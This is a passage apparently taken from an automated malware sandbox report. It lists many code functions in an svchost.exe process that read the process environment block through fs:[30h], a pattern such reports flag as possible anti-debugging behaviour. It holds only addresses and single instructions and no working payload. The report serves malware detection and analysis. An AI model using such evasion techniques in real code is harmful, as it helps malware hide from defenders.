            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE3DB mov eax, dword ptr fs:[00000030h]1_2_038DE3DB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D43D4 mov eax, dword ptr fs:[00000030h]1_2_038D43D4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038403E9 mov eax, dword ptr fs:[00000030h]1_2_038403E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E3F0 mov eax, dword ptr fs:[00000030h]1_2_0384E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038663FF mov eax, dword ptr fs:[00000030h]1_2_038663FF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A30B mov eax, dword ptr fs:[00000030h]1_2_0386A30B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C310 mov ecx, dword ptr fs:[00000030h]1_2_0382C310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03850310 mov ecx, dword ptr fs:[00000030h]1_2_03850310
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov ecx, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03908324 mov eax, dword ptr fs:[00000030h]1_2_03908324
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B2349 mov eax, dword ptr fs:[00000030h]1_2_038B2349
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov ecx, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B035C mov eax, dword ptr fs:[00000030h]1_2_038B035C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038FA352 mov eax, dword ptr fs:[00000030h]1_2_038FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D8350 mov ecx, dword ptr fs:[00000030h]1_2_038D8350
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390634F mov eax, dword ptr fs:[00000030h]1_2_0390634F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D437C mov eax, dword ptr fs:[00000030h]1_2_038D437C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386E284 mov eax, dword ptr fs:[00000030h]1_2_0386E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B0283 mov eax, dword ptr fs:[00000030h]1_2_038B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402A0 mov eax, dword ptr fs:[00000030h]1_2_038402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov ecx, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C62A0 mov eax, dword ptr fs:[00000030h]1_2_038C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383A2C3 mov eax, dword ptr fs:[00000030h]1_2_0383A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039062D6 mov eax, dword ptr fs:[00000030h]1_2_039062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038402E1 mov eax, dword ptr fs:[00000030h]1_2_038402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382823B mov eax, dword ptr fs:[00000030h]1_2_0382823B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov eax, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B8243 mov ecx, dword ptr fs:[00000030h]1_2_038B8243
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0390625D mov eax, dword ptr fs:[00000030h]1_2_0390625D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A250 mov eax, dword ptr fs:[00000030h]1_2_0382A250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836259 mov eax, dword ptr fs:[00000030h]1_2_03836259
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EA250 mov eax, dword ptr fs:[00000030h]1_2_038EA250
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834260 mov eax, dword ptr fs:[00000030h]1_2_03834260
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382826B mov eax, dword ptr fs:[00000030h]1_2_0382826B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E0274 mov eax, dword ptr fs:[00000030h]1_2_038E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03870185 mov eax, dword ptr fs:[00000030h]1_2_03870185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038EC188 mov eax, dword ptr fs:[00000030h]1_2_038EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D4180 mov eax, dword ptr fs:[00000030h]1_2_038D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B019F mov eax, dword ptr fs:[00000030h]1_2_038B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A197 mov eax, dword ptr fs:[00000030h]1_2_0382A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F61C3 mov eax, dword ptr fs:[00000030h]1_2_038F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE1D0 mov eax, dword ptr fs:[00000030h]1_2_038AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039061E5 mov eax, dword ptr fs:[00000030h]1_2_039061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038601F8 mov eax, dword ptr fs:[00000030h]1_2_038601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov eax, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DE10E mov ecx, dword ptr fs:[00000030h]1_2_038DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov ecx, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038DA118 mov eax, dword ptr fs:[00000030h]1_2_038DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F0115 mov eax, dword ptr fs:[00000030h]1_2_038F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860124 mov eax, dword ptr fs:[00000030h]1_2_03860124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov ecx, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C4144 mov eax, dword ptr fs:[00000030h]1_2_038C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C156 mov eax, dword ptr fs:[00000030h]1_2_0382C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C8158 mov eax, dword ptr fs:[00000030h]1_2_038C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03836154 mov eax, dword ptr fs:[00000030h]1_2_03836154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03904164 mov eax, dword ptr fs:[00000030h]1_2_03904164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383208A mov eax, dword ptr fs:[00000030h]1_2_0383208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038280A0 mov eax, dword ptr fs:[00000030h]1_2_038280A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C80A8 mov eax, dword ptr fs:[00000030h]1_2_038C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov eax, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038F60B8 mov ecx, dword ptr fs:[00000030h]1_2_038F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B20DE mov eax, dword ptr fs:[00000030h]1_2_038B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0382A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038380E9 mov eax, dword ptr fs:[00000030h]1_2_038380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B60E0 mov eax, dword ptr fs:[00000030h]1_2_038B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C0F0 mov eax, dword ptr fs:[00000030h]1_2_0382C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038720F0 mov ecx, dword ptr fs:[00000030h]1_2_038720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4000 mov ecx, dword ptr fs:[00000030h]1_2_038B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D2000 mov eax, dword ptr fs:[00000030h]1_2_038D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0384E016 mov eax, dword ptr fs:[00000030h]1_2_0384E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382A020 mov eax, dword ptr fs:[00000030h]1_2_0382A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0382C020 mov eax, dword ptr fs:[00000030h]1_2_0382C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038C6030 mov eax, dword ptr fs:[00000030h]1_2_038C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03832050 mov eax, dword ptr fs:[00000030h]1_2_03832050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B6050 mov eax, dword ptr fs:[00000030h]1_2_038B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0385C073 mov eax, dword ptr fs:[00000030h]1_2_0385C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038D678E mov eax, dword ptr fs:[00000030h]1_2_038D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038307AF mov eax, dword ptr fs:[00000030h]1_2_038307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038E47A0 mov eax, dword ptr fs:[00000030h]1_2_038E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0383C7C0 mov eax, dword ptr fs:[00000030h]1_2_0383C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B07C3 mov eax, dword ptr fs:[00000030h]1_2_038B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038527ED mov eax, dword ptr fs:[00000030h]1_2_038527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE7E1 mov eax, dword ptr fs:[00000030h]1_2_038BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038347FB mov eax, dword ptr fs:[00000030h]1_2_038347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C700 mov eax, dword ptr fs:[00000030h]1_2_0386C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830710 mov eax, dword ptr fs:[00000030h]1_2_03830710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03860710 mov eax, dword ptr fs:[00000030h]1_2_03860710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C720 mov eax, dword ptr fs:[00000030h]1_2_0386C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov ecx, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386273C mov eax, dword ptr fs:[00000030h]1_2_0386273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AC730 mov eax, dword ptr fs:[00000030h]1_2_038AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov esi, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386674D mov eax, dword ptr fs:[00000030h]1_2_0386674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03830750 mov eax, dword ptr fs:[00000030h]1_2_03830750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038BE75D mov eax, dword ptr fs:[00000030h]1_2_038BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03872750 mov eax, dword ptr fs:[00000030h]1_2_03872750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B4755 mov eax, dword ptr fs:[00000030h]1_2_038B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03838770 mov eax, dword ptr fs:[00000030h]1_2_03838770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03840770 mov eax, dword ptr fs:[00000030h]1_2_03840770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03834690 mov eax, dword ptr fs:[00000030h]1_2_03834690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386C6A6 mov eax, dword ptr fs:[00000030h]1_2_0386C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038666B0 mov eax, dword ptr fs:[00000030h]1_2_038666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0386A6C7 mov eax, dword ptr fs:[00000030h]1_2_0386A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038AE6F2 mov eax, dword ptr fs:[00000030h]1_2_038AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_038B06F1 mov eax, dword ptr fs:[00000030h]1_2_038B06F1
